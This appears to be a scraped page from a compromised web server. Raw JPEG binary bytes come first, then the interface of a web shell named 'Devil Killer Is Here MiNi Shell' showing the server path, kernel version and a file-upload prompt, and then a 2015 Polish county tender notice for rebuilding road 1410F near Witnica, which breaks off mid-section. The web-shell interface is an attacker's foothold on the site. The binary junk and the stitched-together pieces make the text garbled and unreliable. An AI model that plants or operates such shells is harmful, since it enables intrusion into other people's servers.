JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150423/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150423/57791-N-2015.html

<p class="kh_header"><b>Gorzów Wielkopolski: Przebudowa drogi powiatowej nr 1410F na odcinku od m. Witnica (ul. Cmentarna) do m. Sosny - Etap I</b><br>
<b>Numer ogłoszenia: 57791 - 2015; data zamieszczenia: 23.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gorzowski , ul. Józefa Pankiewicza 5-7, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7330400, faks 095 7330401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatgorzowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej nr 1410F na odcinku od m. Witnica (ul. Cmentarna) do m. Sosny - Etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja robót pn.: Przebudowa drogi powiatowej nr 1410F na odcinku od m. Witnica (ul. Cmentarna) do m. Sosny - Etap I. 

Inwestycja pn.: Przebudowa drogi powiatowej nr 1410F na odcinku od m. Witnica (ul. Cmentarna) do m. Sosny - Etap I, obejmuje remont i przebudowę odcinka drogi powiatowej o długości 1,591 km i szerokości 6,0 m. Głównym celem projektu jest poprawa bezpieczeństwa użytkowników drogi. W ramach zadania zostanie wykonana nowa konstrukcja jezdni o szerokości 6,0 m i 12 cm grubości nawierzchni asfaltowych, w tym: 5 cm warstwy ścieralnej oraz 7 cm podbudowy zasadniczej (na poszerzeniach na pełnej głębokości z podbudową pomocniczą z kruszywa łamanego). Przed wykonaniem nawierzchni asfaltowej, zostaną wyznaczone odcinki, w których wysokość istniejącej nawierzchni i nierówności są wyższe niż 1 cm ponad warstwę podbudowy zasadniczej i zostaną sfrezowane. Równolegle do przebudowywanego odcinka drogi powiatowej, po prawej stronie (południowej) w kierunku od m. Witnica do m. Sosny zostanie wybudowana ścieżka rowerowa o nawierzchni asfaltowej o szerokości 2,0 m i grubości 4 cm na podbudowie zasadniczej z kruszywa łamanego. Zostaną przebudowane istniejące zjazdy i przestawione krawężniki na ul. Cmentarnej w Witnicy. Zostaną wykonane pobocza: lewostronne o szerokości 0,75 m oraz prawostronnie pas zieleni z poboczem o szerokości 0,8 m oddzielającym jezdnie od ścieżki rowerowej.
Odcinek drogi powiatowej nr 1410F objęty zadaniem zlokalizowany jest w północnej części miejscowości Witnica, rozpoczyna się przed skrzyżowaniem ulicy Cmentarnej z drogą gminną nr G103988F, przy cmentarzu, w miejscu gdzie kończy się nowa nawierzchnia jezdni oraz ciąg pieszo - rowerowy wykonane w 2010 r. w ramach zadania Przebudowa ulic Cmentarnej i Konopnickiej w Witnicy  i następnie prowadzi przez las w kierunku miejscowości Sosny (droga relacji Witnica - Lubno - Marwice - Kłodawa). Odcinek objęty zadaniem kończy się około 1,2 km za Witnicą przed łukiem (skrętem w prawo) i zjazdem na drogę leśną. 
Zakres robót budowlanych, zgodnie z projektem budowlanym, wchodzących w skład inwestycji jest następujący:
Obiekt drogowy objęty projektem znajduje się na działkach w gminie Witnica; w obrębie Witnica o numerach ewidencyjnych: 656/2, 50, w obrębię Nowiny Wielkie o numerze 812.

Stan istniejący:
Na odcinku na którym zostanie wykonana przebudowa drogi, jezdnia posiada nawierzchnię bitumiczną o szerokości od 5,0 m do 5,5 m (na odcinku miejskim 6,0 m). Nawierzchnia jezdni drogi powiatowej wykazuje znaczny stopień uszkodzeń a jej stan można określić jako bardzo zły. Uszkodzenia jezdni stanowią głównie spękania siatkowe, których nasilenie widoczne jest szczególnie w śladach kół pojazdów oraz przy krawędziach jezdni. Widoczne są miejscowe ubytki i wykruszenia materiału bitumicznego przy krawędzi. Podczas przejazdu samochodem wyczuwalny jest nieregularny profil podłużny i poprzeczny jezdni, a na poszerzeniach występują liczne wyboje i nierówności.

Podstawowe parametry techniczne drogi po remoncie:
- kategoria - droga powiatowa, ogólnodostępna
- klasa techniczna - Z (zbiorcza),
- kategoria ruchu - KR2,
- przekrój - uliczny, drogowy,
- prędkość projektowa - Vp = 40 km/h,
- szerokość jezdni - 6,0 m,
- szerokość ścieżki - 2,0 m,
- pochylenie jezdni - 2,0%, ścieżki 2,0%,
- szerokość poboczy - 0,75 m, (strona prawa 0,8 m),
- pochylenie poboczy - 8%
Przekrój - konstrukcja:
Przed rozpoczęciem prac zostanie zdjęty humus, wyprofilowane podłoże poszerzeń (poboczy) oraz ścieżki rowerowej.
Poszczególne warstwy konstrukcji jezdni przedstawiają się następująco:
Konstrukcja nawierzchni asfaltowej na poszerzeniu:
- warstwa ścieralna AC 11 50/70 gr. 5 cm,
- podbudowa zasadnicza AC 16 P 50/70 gr. 7cm,
- podbudowa pomocnicza, kruszywo łamane stabilizowane mechanicznie 0/31,5 mm grubości 20 cm
Konstrukcja nawierzchni asfaltowej nakładka:
- warstwa ścieralna AC 11 50/70 gr. 5 cm,
- podbudowa zasadnicza AC 16 P 50/70 gr. 7 cm,
- wyrównanie masa asfaltową jak dla podbudowy zasadniczej AC 16 P 50/70. Warstwę wyrównawczą w związku z niewielką grubością można rozkładać wraz z podbudową zasadniczą, pod warunkiem uzyskania właściwego profilu podłużnego i poprzecznego podbudowy i zagęszczenia mieszanki.
Konstrukcja nawierzchni asfaltowej - ścieżka rowerowa, zjazdy:
- warstwa ścieralna AC 11 50/70 gr. 4 cm,
- podbudowa zasadnicza kruszywo łamane stabilizowane mechanicznie 0/31,5 mm grubości 15 cm.

Uwaga: zagęszczenie warstw podłoża i warstw podsypkowych należy wykonać zgodnie z Polską Normą PN-S-02205 (Drogi samochodowe Roboty Ziemne Wymagania i badania).
Warstwa gleby (humusu) powinna być ściągnięta i składowana (zgodnie z obowiązującymi przepisami) na miejscu wskazanym przez Inwestora.
Wykonane koryto należy zabezpieczyć przed ingerencją wody opadowej, w tym celu niezwłocznie powinno się przystąpić do wykonania warstw konstrukcyjnych jezdni i zjazdów.
W przypadku natrafienia w podłożu na grunty wysadzinowe lub gdy nośność podłoża po dogęszczeniu wynosi poniżej 35 MPa należy zwrócić się do nadzoru autorskiego o przeanalizowanie sposobu wzmocnienie podłoża.
Infrastruktura podziemna:
Rozpoczęcie robót wykonywać po zgłoszeniu zamiaru rozpoczęcia prac do wszystkich właścicieli sieci z wyprzedzeniem min 14 dni.
Przed rozpoczęciem robót związanych z korytowaniem wykonać ręcznie przekopy próbne, w momencie stwierdzenia nienormatywnego przykrycia kabla lub natrafienia na niezinwentaryzowane sieci podziemne przerwać wszelkie prace oraz powiadomić właściciela danej sieci w celu uzgodnienia dalszego sposobu prowadzenia robót.

UWAGA: 
Wszystkie prace należy przeprowadzić zgodnie z obowiązującymi Polskimi Normami, przepisami, uzgodnieniami, specyfikacjami technicznymi, projektem wykonawczym i w koordynacji z zarządcami istniejących sieci. Prawidłowa realizacja przedsięwzięcia związana jest z przestrzeganiem ostrych reżimów technologicznych i prawnych remontowanej istniejącej nawierzchni, zastosowaniem wysokiej jakości sprzętu i materiałów budowlanych. Wynika to z obowiązujących aktów normatywno- prawnych, w tym przepisów dotyczących ochrony środowiska naturalnego, których znajomością musi się wykazać zarówno Wykonawca jak i przedstawiciele Inwestora.

Zamawiający zastrzega zgodnie z art. 36a, ust. 2, pkt 1) Ustawy Pzp obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia na roboty budowlane tj.: Wykonawca musi samodzielnie wykonać nawierzchnię jezdni, w tym warstwę ścieralną i podbudowę zasadniczą z betonu asfaltowego.
UWAGA!
Zamawiający nie dopuszcza zmiany terminu zakończenia zadania przez Wykonawcę. 
Zadanie realizowane w 2015 r., przy dofinansowaniu z budżetu państwa w ramach Narodowego Programu Przebudowy Dróg Lokalnych - Etap II Bezpieczeństwo - Dostępność - Rozwój.
W przypadku utraty przez Zamawiającego dofinansowania na skutek niewykonania zadania przez Wykonawcę w określonym terminie, Wykonawca zobowiązany będzie do uiszczenia całej kwoty dofinansowania utraconego przez Zamawiającego wraz z odsetkami liczonymi jak dla zaległości podatkowych oraz innymi kosztami poniesionymi przez Zamawiającego wynikającymi z utraty dofinansowania.
Wyjątkiem jest sytuacja gdy zmiana terminu realizacji niniejszej umowy nastąpi pisemnie za zgodą Zamawiającego. Zmiana taka dopuszczalna jest wyłącznie z przyczyn: warunków pogodowych uniemożliwiających prowadzenie robót zgodnie z przewidywaną technologią (opady, zbyt niskie temperatury), błędów projektowych lub zmiany warunków realizacji zamówienia z przyczyn, których nie można było przewidzieć przed zawarciem umowy, wystąpienia w czasie realizacji i na terenie objętym czynnościami Wykonawcy robót klęski żywiołowej, zmian w zasadach finansowania zamówienia.
Szczegółowy zakres robót do wykonania przedmiotu zamówienia, określa dokumentacja projektowa na zgłoszenie robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych oraz inne dokumenty załączone do niniejszej SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.31.42-6, 45.23.32.23-8, 45.23.31.62-2, 45.11.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wpłaty wadium w wysokości 40.000,00 zł (słownie: czterdzieści tysięcy złotych 00/100). 
Wadium może być wniesione w formach przewidzianych art. 45 ust. 6 ustawy Pzp, tj.: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia, w którym Wykonawca oświadczy, że może ubiegać się o zamówienie, nie podlega wykluczeniu na podstawie art. 24, ust. 1 i 2 i spełnia warunki określone na podstawie art. 22 ust. 1 Ustawy Pzp. Zamawiający oceni warunek metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek na podstawie wykazu zamówień, w którym Wykonawca wykaże się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: - minimum 2 robót budowlanych polegających na remoncie lub/i przebudowie dróg o kategorii drogi lokalnej (gminnej lub powiatowej) lub wyższej. Zakres wykonanych robót budowlanych winien obejmować wykonanie nawierzchni jezdni, w tym warstwy ścieralnej i podbudowy. Wartość każdego z wykazanych zadań nie może być niższa niż 2.000.000,00 zł brutto. Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek na podstawie wykazu narzędzi, wyposażenia i urządzeń technicznych (wykazu sprzętu) dostępnych Wykonawcy robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami. Wykonawca w wyżej wymienionym wykazie wykaże, że dysponuje odpowiednim potencjałem technicznym: posiada i/lub ma zapewniony dostęp (przez dzierżawę, wynajem, umowę kupna lub w inny sposób) do wymaganych w pełni sprawnych jednostek, do zapewnienia wykonania dobrej jakości robót. Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek na podstawie Wykazu osób (potencjał kadrowy, kluczowy personel Wykonawcy), które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami oraz na podstawie Oświadczenia, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
Wykonawca w wyżej wymienionym wykazie wykaże, że będzie dysponował co najmniej 1 osobą posiadającą doświadczenie zawodowe oraz uprawnienia budowlane niezbędne do realizacji robót drogowych, w tym: Kierownik budowy: - wymagane kwalifikacje i doświadczenie zawodowe: - uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotami budowlanymi w specjalności drogowej, - co najmniej 5 lat doświadczenia na stanowisku kierownika budowy. Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek na podstawie Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert oraz na podstawie
Kopii opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Wykonawca w wyżej wymienionych dokumentach wykaże, że: 1. posiada środki finansowe lub zdolność kredytową niezbędną do wykonania zadania w wysokości nie niższej niż 2.000.000,00 zł, 2. posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie niższą jak 1.500.000,00 złotych (jeden milion pięćset tysięcy złotych 00/100).   Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Potwierdzenie wpłaty wadium.
2. Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
